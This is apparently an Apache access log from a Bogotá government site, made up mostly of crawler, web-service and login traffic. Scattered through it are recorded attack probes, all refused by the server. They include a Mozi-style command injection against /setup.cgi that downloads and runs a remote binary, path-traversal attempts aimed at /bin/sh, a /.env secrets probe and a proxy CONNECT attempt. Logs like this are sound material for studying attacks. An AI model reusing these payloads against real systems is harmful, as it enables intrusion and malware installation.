207.46.13.52 - - [23/Dec/2021:02:22:42 -0500] "GET /bla/resoluciones/autos%202010/4435.pdf HTTP/1.1" 200 1224063
207.46.13.52 - - [23/Dec/2021:02:22:45 -0500] "GET /bla/resoluciones/autos%202010/5644.pdf HTTP/1.1" 200 165580
207.46.13.52 - - [23/Dec/2021:02:22:47 -0500] "GET /bla/resoluciones/autos%202010/1425.pdf HTTP/1.1" 200 248983
207.46.13.52 - - [23/Dec/2021:02:23:02 -0500] "GET /bla/resoluciones/autos%202010/2452.pdf HTTP/1.1" 200 204543
207.46.13.52 - - [23/Dec/2021:02:23:09 -0500] "GET /bla/resoluciones/autos%202010/6819.pdf HTTP/1.1" 200 145307
207.46.13.52 - - [23/Dec/2021:02:23:23 -0500] "GET /bla/resoluciones/autos%202010/3027.pdf HTTP/1.1" 200 1442590
207.46.13.52 - - [23/Dec/2021:02:23:26 -0500] "GET /bla/resoluciones/autos%202010/0102.pdf HTTP/1.1" 200 301093
201.245.192.253 - - [23/Dec/2021:02:23:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45645
201.245.192.253 - - [23/Dec/2021:02:23:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115071
173.252.107.18 - - [23/Dec/2021:02:24:41 -0500] "GET /images/Trafico1.jpeg HTTP/1.1" 200 83575
173.252.107.8 - - [23/Dec/2021:02:24:41 -0500] "GET /images/PIGA1.jpeg HTTP/1.1" 200 167676
173.252.107.2 - - [23/Dec/2021:02:24:41 -0500] "GET /images/Senderos1.jpeg HTTP/1.1" 200 172777
69.63.184.112 - - [23/Dec/2021:02:24:45 -0500] "GET /images/pieza-grafica-actividades-navidad-13-diciembre.jpg HTTP/1.1" 200 46733
173.252.107.16 - - [23/Dec/2021:02:24:45 -0500] "GET /images/Aniversario1.jpg HTTP/1.1" 200 103242
173.252.107.18 - - [23/Dec/2021:02:24:56 -0500] "GET /images/paneles-solares-22septiembre.jpeg HTTP/1.1" 200 66691
173.252.107.21 - - [23/Dec/2021:02:24:56 -0500] "GET /images/tarantulas-incatuacion-dorado-1-diciembre.jpg HTTP/1.1" 200 31749
69.63.184.3 - - [23/Dec/2021:02:24:56 -0500] "GET /images/humedal-santa-maria-30-noviembre.jpg HTTP/1.1" 200 198328
201.245.192.253 - - [23/Dec/2021:02:24:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45329
69.63.184.117 - - [23/Dec/2021:02:25:00 -0500] "GET /images/musgo-planta-flora-bogota-27-noviembre.jpg HTTP/1.1" 200 65902
216.245.221.92 - - [23/Dec/2021:02:26:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Dec/2021:02:26:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115071
92.184.110.10 - - [23/Dec/2021:02:27:28 -0500] "GET /generadores-de-residuos-hospitalarios-deberan-contratar-un-gestor-autorizado-para-su-tratamiento.html HTTP/1.1" 200 1003
66.249.79.236 - - [23/Dec/2021:02:28:18 -0500] "-" 408 -
20.36.244.102 - - [23/Dec/2021:02:29:39 -0500] "GET /noticias/rssambiente.php HTTP/1.1" 406 -
216.245.221.92 - - [23/Dec/2021:02:31:04 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.113 - - [23/Dec/2021:02:31:29 -0500] "GET /BLA/resoluciones/AUTOS%202018/0702.pdf HTTP/1.1" 200 277774
201.245.192.253 - - [23/Dec/2021:02:31:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115071
201.245.192.253 - - [23/Dec/2021:02:33:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45645
201.245.192.253 - - [23/Dec/2021:02:34:10 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.79.236 - - [23/Dec/2021:02:34:31 -0500] "-" 408 -
201.245.192.253 - - [23/Dec/2021:02:34:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45329
216.245.221.92 - - [23/Dec/2021:02:36:04 -0500] "HEAD / HTTP/1.1" 200 -
123.183.224.168 - - [23/Dec/2021:02:39:08 -0500] "GET / HTTP/1.1" 200 319
66.249.79.236 - - [23/Dec/2021:02:40:20 -0500] "-" 408 -
216.245.221.92 - - [23/Dec/2021:02:41:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Dec/2021:02:41:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115071
198.98.55.155 - - [23/Dec/2021:02:43:44 -0500] "GET /wp-content/themes/wp-porn/style.css HTTP/1.1" 404 1016
207.46.13.113 - - [23/Dec/2021:02:44:01 -0500] "GET /bla/resoluciones/autos%202020/2978.pdf HTTP/1.1" 200 372237
201.245.192.253 - - [23/Dec/2021:02:43:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45645
201.245.192.253 - - [23/Dec/2021:02:44:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45329
66.249.79.236 - - [23/Dec/2021:02:46:04 -0500] "-" 408 -
216.245.221.92 - - [23/Dec/2021:02:46:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Dec/2021:02:45:20 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115071
207.46.13.113 - - [23/Dec/2021:02:48:30 -0500] "GET /bla/resoluciones/autos%202010/4580.pdf HTTP/1.1" 200 2143230
157.55.39.91 - - [23/Dec/2021:02:48:30 -0500] "GET /bla/resoluciones/autos%202010/1440.pdf HTTP/1.1" 200 165456
157.55.39.106 - - [23/Dec/2021:02:48:31 -0500] "GET /bla/resoluciones/autos%202010/5324.pdf HTTP/1.1" 200 151492
157.55.39.106 - - [23/Dec/2021:02:48:41 -0500] "GET /bla/resoluciones/autos%202010/1121.pdf HTTP/1.1" 200 184039
216.245.221.92 - - [23/Dec/2021:02:51:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Dec/2021:02:52:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115071
216.245.221.92 - - [23/Dec/2021:02:56:04 -0500] "HEAD / HTTP/1.1" 200 -
195.54.160.149 - - [23/Dec/2021:02:57:09 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [23/Dec/2021:03:01:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Dec/2021:03:02:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115071
66.249.79.236 - - [23/Dec/2021:03:03:54 -0500] "-" 408 -
216.245.221.92 - - [23/Dec/2021:03:06:04 -0500] "HEAD / HTTP/1.1" 200 -
69.194.182.218 - - [23/Dec/2021:03:06:04 -0500] "GET /.env HTTP/1.1" 404 1018
69.194.182.218 - - [23/Dec/2021:03:06:05 -0500] "POST / HTTP/1.1" 200 319
201.245.192.253 - - [23/Dec/2021:03:07:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115072
207.46.13.88 - - [23/Dec/2021:03:09:33 -0500] "GET /forest/ HTTP/1.1" 200 12041
13.66.139.1 - - [23/Dec/2021:03:09:49 -0500] "-" 408 -
216.245.221.92 - - [23/Dec/2021:03:11:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Dec/2021:03:11:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115072
157.143.157.14 - - [23/Dec/2021:03:14:12 -0500] "GET /generadores-de-residuos-hospitalarios-deberan-contratar-un-gestor-autorizado-para-su-tratamiento.html HTTP/1.1" 200 1003
157.55.39.91 - - [23/Dec/2021:03:16:03 -0500] "GET /sipse/faces/presentacion/sistema/anexos/cargarAnexoSolicitudProceso.xhtml HTTP/1.1" 302 -
216.245.221.92 - - [23/Dec/2021:03:16:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Dec/2021:03:15:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115072
157.55.39.91 - - [23/Dec/2021:03:16:13 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12174
66.249.79.236 - - [23/Dec/2021:03:18:16 -0500] "-" 408 -
35.204.78.190 - - [23/Dec/2021:03:19:04 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [23/Dec/2021:03:21:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Dec/2021:03:23:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115072
201.245.192.253 - - [23/Dec/2021:03:23:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45489
201.245.192.253 - - [23/Dec/2021:03:24:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45330
216.245.221.92 - - [23/Dec/2021:03:26:04 -0500] "HEAD / HTTP/1.1" 200 -
13.66.139.0 - - [23/Dec/2021:03:27:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2077.pdf HTTP/1.1" 200 386261
66.249.79.236 - - [23/Dec/2021:03:27:04 -0500] "-" 408 -
201.245.192.253 - - [23/Dec/2021:03:26:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115072
216.245.221.92 - - [23/Dec/2021:03:31:04 -0500] "HEAD / HTTP/1.1" 200 -
66.249.79.236 - - [23/Dec/2021:03:32:50 -0500] "-" 408 -
201.245.192.253 - - [23/Dec/2021:03:32:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115072
201.245.192.253 - - [23/Dec/2021:03:33:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45489
201.245.192.253 - - [23/Dec/2021:03:34:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45330
216.245.221.92 - - [23/Dec/2021:03:36:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Dec/2021:03:36:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115072
66.249.79.236 - - [23/Dec/2021:03:38:37 -0500] "-" 408 -
40.77.167.55 - - [23/Dec/2021:03:40:50 -0500] "GET /bla/resoluciones/resoluciones%202021/1907.pdf HTTP/1.1" 200 347671
216.245.221.92 - - [23/Dec/2021:03:41:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Dec/2021:03:42:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115072
201.245.192.253 - - [23/Dec/2021:03:43:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45489
66.249.79.236 - - [23/Dec/2021:03:44:23 -0500] "-" 408 -
201.245.192.253 - - [23/Dec/2021:03:44:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45330
128.14.141.34 - - [23/Dec/2021:03:45:05 -0500] "GET / HTTP/1.1" 200 319
128.14.141.34 - - [23/Dec/2021:03:45:06 -0500] "HEAD /icons/sphere1.png HTTP/1.1" 200 -
128.14.141.34 - - [23/Dec/2021:03:45:06 -0500] "HEAD /icons/.%2e/%2e%2e/apache2/icons/sphere1.png HTTP/1.1" 400 -
128.14.141.34 - - [23/Dec/2021:03:45:06 -0500] "HEAD /icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png HTTP/1.1" 400 -
128.14.141.34 - - [23/Dec/2021:03:45:07 -0500] "HEAD /icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png HTTP/1.1" 400 -
216.245.221.92 - - [23/Dec/2021:03:46:04 -0500] "HEAD / HTTP/1.1" 200 -
195.54.160.149 - - [23/Dec/2021:03:47:06 -0500] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 945
207.46.13.113 - - [23/Dec/2021:03:47:08 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12496
201.245.192.253 - - [23/Dec/2021:03:46:24 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115072
66.249.79.236 - - [23/Dec/2021:03:50:09 -0500] "-" 408 -
216.245.221.92 - - [23/Dec/2021:03:51:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Dec/2021:03:52:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115072
66.249.79.236 - - [23/Dec/2021:03:55:55 -0500] "-" 408 -
216.245.221.92 - - [23/Dec/2021:03:56:04 -0500] "HEAD / HTTP/1.1" 200 -
66.249.84.187 - - [23/Dec/2021:03:56:24 -0500] "GET /galeria/mapa/3MapaBogot%C3%A1.jpg HTTP/1.1" 200 688183
66.249.79.44 - - [23/Dec/2021:03:56:34 -0500] "-" 408 -
201.245.192.253 - - [23/Dec/2021:03:56:21 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115072
23.90.160.114 - - [23/Dec/2021:03:57:51 -0500] "GET /solr/ HTTP/1.1" 404 1018
216.245.221.92 - - [23/Dec/2021:04:01:04 -0500] "HEAD / HTTP/1.1" 200 -
66.249.79.236 - - [23/Dec/2021:04:02:03 -0500] "-" 408 -
201.245.192.253 - - [23/Dec/2021:04:02:27 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115072
93.124.34.201 - - [23/Dec/2021:04:04:57 -0500] "GET / HTTP/1.0" 200 319
89.248.165.52 - - [23/Dec/2021:04:05:53 -0500] "CONNECT hotmail-com.olc.protection.outlook.com:25 HTTP/1.1" 405 966
216.245.221.92 - - [23/Dec/2021:04:06:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Dec/2021:04:06:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114664
66.249.79.236 - - [23/Dec/2021:04:07:59 -0500] "-" 408 -
216.245.221.92 - - [23/Dec/2021:04:11:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Dec/2021:04:12:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114664
66.249.79.236 - - [23/Dec/2021:04:13:53 -0500] "-" 408 -
216.245.221.92 - - [23/Dec/2021:04:16:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Dec/2021:04:16:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114664
195.54.160.149 - - [23/Dec/2021:04:17:38 -0500] "GET / HTTP/1.1" 200 319
66.249.79.236 - - [23/Dec/2021:04:20:00 -0500] "-" 408 -
216.245.221.92 - - [23/Dec/2021:04:21:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Dec/2021:04:22:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114664
201.245.192.253 - - [23/Dec/2021:04:23:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45640
34.147.63.135 - - [23/Dec/2021:04:24:15 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [23/Dec/2021:04:24:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45165
66.249.79.236 - - [23/Dec/2021:04:25:43 -0500] "-" 408 -
216.245.221.92 - - [23/Dec/2021:04:26:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Dec/2021:04:26:27 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114664
216.245.221.92 - - [23/Dec/2021:04:31:04 -0500] "HEAD / HTTP/1.1" 200 -
66.249.79.236 - - [23/Dec/2021:04:32:08 -0500] "-" 408 -
125.47.244.225 - - [23/Dec/2021:04:32:49 -0500] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://125.47.244.225:53226/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 1019
201.245.192.253 - - [23/Dec/2021:04:33:20 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114664
201.245.192.253 - - [23/Dec/2021:04:33:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45640
201.245.192.253 - - [23/Dec/2021:04:34:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45165
216.245.221.92 - - [23/Dec/2021:04:36:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Dec/2021:04:36:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114664
40.77.167.55 - - [23/Dec/2021:04:37:15 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2021%2F HTTP/1.1" 200 204764
66.249.79.236 - - [23/Dec/2021:04:37:51 -0500] "-" 408 -
216.245.221.92 - - [23/Dec/2021:04:41:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Dec/2021:04:42:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114664
201.245.192.253 - - [23/Dec/2021:04:43:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45640
201.245.192.253 - - [23/Dec/2021:04:44:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45165
66.249.79.236 - - [23/Dec/2021:04:45:08 -0500] "-" 408 -
181.137.113.109 - - [23/Dec/2021:04:45:34 -0500] "GET /mesa/contrasena.pdf HTTP/1.1" 200 443199
181.137.113.109 - - [23/Dec/2021:04:45:35 -0500] "GET /mesa/contrasena.pdf HTTP/1.1" 206 49983
216.245.221.92 - - [23/Dec/2021:04:46:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Dec/2021:04:46:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114664
190.102.124.108 - - [23/Dec/2021:04:47:39 -0500] "GET /reportes_sipse/sdg/ServletReporte?reporte=solicitud_cdp&Solicitud=16638&pfdrid_c=false HTTP/1.1" 200 122220
190.102.124.108 - - [23/Dec/2021:04:49:34 -0500] "GET /reportes_sipse/sdg/ServletReporte?reporte=solicitud_cdp&Solicitud=16638&pfdrid_c=false HTTP/1.1" 200 122220
216.245.221.92 - - [23/Dec/2021:04:51:04 -0500] "HEAD / HTTP/1.1" 200 -
66.249.79.236 - - [23/Dec/2021:04:51:43 -0500] "-" 408 -
201.245.192.253 - - [23/Dec/2021:04:51:08 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114664
186.102.35.176 - - [23/Dec/2021:04:52:27 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.245.192.253 - - [23/Dec/2021:04:52:56 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
201.245.192.253 - - [23/Dec/2021:04:52:57 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
201.245.192.253 - - [23/Dec/2021:04:52:57 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
201.245.192.253 - - [23/Dec/2021:04:52:57 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
201.245.192.253 - - [23/Dec/2021:04:52:57 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
201.245.192.253 - - [23/Dec/2021:04:52:57 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [23/Dec/2021:04:53:26 -0500] "POST /appsia/controlador HTTP/1.1" 200 4621
201.245.192.253 - - [23/Dec/2021:04:53:30 -0500] "POST /appsia/controlador HTTP/1.1" 200 7735
201.245.192.253 - - [23/Dec/2021:04:53:30 -0500] "GET /appsia/images/logo_escudo.png HTTP/1.1" 200 36965
198.98.49.124 - - [23/Dec/2021:04:54:12 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [23/Dec/2021:04:56:04 -0500] "HEAD / HTTP/1.1" 200 -
190.102.124.108 - - [23/Dec/2021:04:56:47 -0500] "GET /reportes_sipse/sdg/ServletReporte?reporte=solicitud_cdp&Solicitud=16638&pfdrid_c=false HTTP/1.1" 200 122220
201.245.192.253 - - [23/Dec/2021:04:57:23 -0500] "POST /appsia/controlador HTTP/1.1" 200 4621
216.245.221.92 - - [23/Dec/2021:05:01:04 -0500] "HEAD / HTTP/1.1" 200 -
190.102.124.108 - - [23/Dec/2021:05:01:48 -0500] "GET /reportes_sipse/sdg/ServletReporte?reporte=solicitud_cdp&Solicitud=16638&pfdrid_c=false HTTP/1.1" 200 122220
66.249.79.236 - - [23/Dec/2021:05:02:27 -0500] "-" 408 -
201.245.192.253 - - [23/Dec/2021:05:02:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114664
216.245.221.92 - - [23/Dec/2021:05:06:04 -0500] "HEAD / HTTP/1.1" 200 -
13.66.139.1 - - [23/Dec/2021:05:06:45 -0500] "-" 408 -
201.245.192.253 - - [23/Dec/2021:05:06:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 213
178.79.189.226 - - [23/Dec/2021:05:08:05 -0500] "GET / HTTP/1.1" 200 319
66.249.79.236 - - [23/Dec/2021:05:08:09 -0500] "-" 408 -
216.245.221.92 - - [23/Dec/2021:05:11:04 -0500] "HEAD / HTTP/1.1" 200 -
176.80.132.1 - - [23/Dec/2021:05:11:12 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
176.80.132.1 - - [23/Dec/2021:05:11:15 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
176.80.132.1 - - [23/Dec/2021:05:11:15 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
157.55.39.33 - - [23/Dec/2021:05:12:43 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [23/Dec/2021:05:12:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115078
198.98.52.220 - - [23/Dec/2021:05:14:30 -0500] "GET http://us.vansto.net/verify.txt HTTP/1.1" 404 1017
66.249.79.236 - - [23/Dec/2021:05:14:40 -0500] "-" 408 -
216.245.221.92 - - [23/Dec/2021:05:16:04 -0500] "HEAD / HTTP/1.1" 200 -
190.102.124.108 - - [23/Dec/2021:05:16:24 -0500] "GET /reportes_sipse/sdg/ServletReporte?reporte=solicitud_cdp&Solicitud=16638&pfdrid_c=false HTTP/1.1" 200 122220
201.245.192.253 - - [23/Dec/2021:05:16:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115078
207.46.13.113 - - [23/Dec/2021:05:19:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/00001096.tif HTTP/1.1" 200 221778
66.249.79.236 - - [23/Dec/2021:05:20:52 -0500] "-" 408 -
216.245.221.92 - - [23/Dec/2021:05:21:04 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.91 - - [23/Dec/2021:05:21:06 -0500] "GET /sipse/faces/presentacion/financiero/solicitudProceso/consultarHistorialSolProceso.xhtml HTTP/1.1" 302 -
157.55.39.91 - - [23/Dec/2021:05:21:15 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12174
201.245.192.253 - - [23/Dec/2021:05:21:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115078
201.245.192.253 - - [23/Dec/2021:05:23:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45495
181.54.230.226 - - [23/Dec/2021:05:24:34 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
181.54.230.226 - - [23/Dec/2021:05:24:35 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
181.54.230.226 - - [23/Dec/2021:05:24:35 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
181.54.230.226 - - [23/Dec/2021:05:24:35 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
181.54.230.226 - - [23/Dec/2021:05:24:35 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
201.245.192.253 - - [23/Dec/2021:05:24:08 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45336
181.54.230.226 - - [23/Dec/2021:05:25:30 -0500] "POST /appsia/controlador HTTP/1.1" 200 4621
216.245.221.92 - - [23/Dec/2021:05:26:04 -0500] "HEAD / HTTP/1.1" 200 -
34.141.213.101 - - [23/Dec/2021:05:26:07 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [23/Dec/2021:05:26:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115078
66.249.79.236 - - [23/Dec/2021:05:28:51 -0500] "-" 408 -
190.27.245.107 - - [23/Dec/2021:05:29:07 -0500] "GET /sipse/ HTTP/1.1" 302 -
186.84.90.195 - - [23/Dec/2021:05:29:07 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12496
186.84.90.195 - - [23/Dec/2021:05:29:07 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 304 -
186.84.90.195 - - [23/Dec/2021:05:29:07 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 304 -
186.84.90.195 - - [23/Dec/2021:05:29:07 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css;jsessionid=ePrA40zsFVUgH5RiiRwwoslQ.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 542
186.84.90.195 - - [23/Dec/2021:05:29:07 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.84.90.195 - - [23/Dec/2021:05:29:07 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
186.84.90.195 - - [23/Dec/2021:05:29:07 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
186.84.90.195 - - [23/Dec/2021:05:29:07 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css;jsessionid=ePrA40zsFVUgH5RiiRwwoslQ.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
186.84.90.195 - - [23/Dec/2021:05:29:07 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js;jsessionid=ePrA40zsFVUgH5RiiRwwoslQ.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
186.84.90.195 - - [23/Dec/2021:05:29:07 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js;jsessionid=ePrA40zsFVUgH5RiiRwwoslQ.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
186.84.90.195 - - [23/Dec/2021:05:29:07 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js;jsessionid=ePrA40zsFVUgH5RiiRwwoslQ.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
186.84.90.195 - - [23/Dec/2021:05:29:07 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js;jsessionid=ePrA40zsFVUgH5RiiRwwoslQ.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
186.84.90.195 - - [23/Dec/2021:05:29:07 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 304 -
186.84.90.195 - - [23/Dec/2021:05:29:07 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 304 -
186.84.90.195 - - [23/Dec/2021:05:29:07 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.84.90.195 - - [23/Dec/2021:05:29:07 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
186.84.90.195 - - [23/Dec/2021:05:29:07 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.84.90.195 - - [23/Dec/2021:05:29:08 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12174
186.84.90.195 - - [23/Dec/2021:05:29:08 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.84.90.195 - - [23/Dec/2021:05:29:08 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.90.195 - - [23/Dec/2021:05:29:08 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.90.195 - - [23/Dec/2021:05:29:08 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.90.195 - - [23/Dec/2021:05:29:08 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.90.195 - - [23/Dec/2021:05:29:08 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.90.195 - - [23/Dec/2021:05:29:08 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.90.195 - - [23/Dec/2021:05:29:08 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.84.90.195 - - [23/Dec/2021:05:29:11 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 2217
186.84.90.195 - - [23/Dec/2021:05:29:11 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.90.195 - - [23/Dec/2021:05:29:12 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16358
